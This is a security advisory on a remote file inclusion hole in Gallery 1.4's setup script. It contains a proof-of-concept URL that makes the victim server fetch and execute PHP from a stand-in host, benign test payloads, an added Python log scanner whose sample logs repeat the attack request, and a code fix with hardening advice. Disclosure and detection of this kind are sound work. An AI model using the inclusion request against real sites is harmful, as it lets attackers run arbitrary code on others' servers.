
Gallery 1.4 remote file inclusion vulnerability

-Background Information-
Gallery is a Web-based software product that lets you manage photos on any Web 
site that offers PHP support. With Gallery you can easily create and maintain 
albums of photos via an intuitive interface. Photo management includes 
automatic thumbnail creation, image resizing, rotation, ordering, captioning, 
searching, and more. Albums can have read, write, and caption permissions per 
individual authenticated user for an additional level of privacy. Gallery is 
installed at an estimated 20,000 sites.

-Proof of concept-
The setup script uses the variable $GALLERY_BASEDIR as the directory prefix 
for the files it includes, and it only assigns the default value when the 
variable is not already set. When PHP's register_globals is enabled, a request 
parameter of the same name sets that variable before the script runs, so an 
attacker can point it at a host under his control and have PHP fetch and 
execute any PHP file from there on the target's server (include() follows 
URLs as long as allow_url_fopen is on).

This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/

If the file http://tester/util.php exists, it is included and executed on the 
victim. The file can look like this if PHP is not enabled on the "tester" host 
(the file is served as plain text and interpreted by the victim's PHP):

<?php echo "Vulnerable"; ?>

or like this if PHP is enabled on the "tester" host (the tester's PHP runs the 
outer script, and its output is the code the victim then executes):

<?php
echo "<?php die(\"Vulnerable\"); ?>";
?>
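
Because the setup script never expects GALLERY_BASEDIR from the client, any 
request that carries it is worth flagging. The following log scanner is an 
added example, not part of this advisory or of Gallery: it parses Apache 
combined-format access log lines, picks out requests to setup/index.php that 
supply GALLERY_BASEDIR, and classifies the value as a remote URL (any 
scheme://, also when percent-encoded) or a local path override. The log lines, 
hosts and addresses are constructed for the example.

```python
"""Flag Gallery 1.4 setup/index.php requests that supply GALLERY_BASEDIR.

Added example, not code from the advisory or from Gallery. The log lines below
are constructed in Apache combined-log format; addresses and hosts are made up.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2003:14:02:11 +0100] "GET /gallery/albums.php HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
10.0.0.9 - - [10/Dec/2003:14:02:45 +0100] "GET /gallery/setup/index.php?GALLERY_BASEDIR=http://tester/ HTTP/1.0" 200 311 "-" "Mozilla/4.0"
10.0.0.9 - - [10/Dec/2003:14:03:02 +0100] "GET /gallery/setup/index.php?GALLERY_BASEDIR=hTTp%3A%2F%2Ftester%2F HTTP/1.0" 200 311 "-" "Mozilla/4.0"
10.0.0.12 - - [10/Dec/2003:14:05:10 +0100] "GET /gallery/setup/index.php HTTP/1.0" 200 9870 "-" "Mozilla/4.0"
10.0.0.13 - - [10/Dec/2003:14:06:00 +0100] "POST /gallery/setup/index.php HTTP/1.0" 200 9870 "-" "Mozilla/4.0"
"""

# Leading fields of a combined-format line: client, identity, user, timestamp,
# request line (method, target, protocol) and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Anything of the form scheme:// makes include() fetch the file remotely.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def classify_basedir(value):
    """Return 'remote' for URL-style values and 'local' for anything else."""
    decoded = unquote(unquote(value))  # tolerate double percent-encoding
    return "remote" if SCHEME_RE.match(decoded.lstrip()) else "local"


def analyze_line(line):
    """Return a finding dict for a GALLERY_BASEDIR request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/setup/index.php"):
        return None
    # register_globals variable names are case-sensitive, so only the exact
    # parameter name reaches $GALLERY_BASEDIR in the script.
    values = parse_qs(parts.query, keep_blank_values=True).get("GALLERY_BASEDIR")
    if not values:
        return None
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "basedir": values[0],
        "kind": classify_basedir(values[0]),
    }


def scan_log(text):
    """Run analyze_line over every line of a log and collect the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} GALLERY_BASEDIR={f['basedir']!r} "
              f"-> {f['kind']} inclusion attempt (HTTP {f['status']})")
```

Access logs only record the query string, so this catches GET-based attempts; 
with register_globals the same variable can also be set from a POST body or a 
cookie, which do not appear in the log. For those, the only reliable check is 
on the server itself: the fix below, plus register_globals = Off.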

-Solution-
Change the following lines in the file index.php in the setup folder:

if (!isset($GALLERY_BASEDIR)) {
        $GALLERY_BASEDIR = '../';
}

to this:

        $GALLERY_BASEDIR = '../';

With the isset() check gone, the variable is always overwritten with the fixed 
path, so a value supplied in the request has no effect. As additional 
hardening, turn off register_globals in php.ini (then request parameters never 
become global variables in the first place) and, if the site does not need it, 
allow_url_fopen as well, so that include() cannot fetch files over HTTP at all.

-Related URLs-
http://gallery.sourceforge.net/
https://sourceforge.net/projects/gallery/

Peter Stöckli
RQ Labs
Rootquest
Switzerland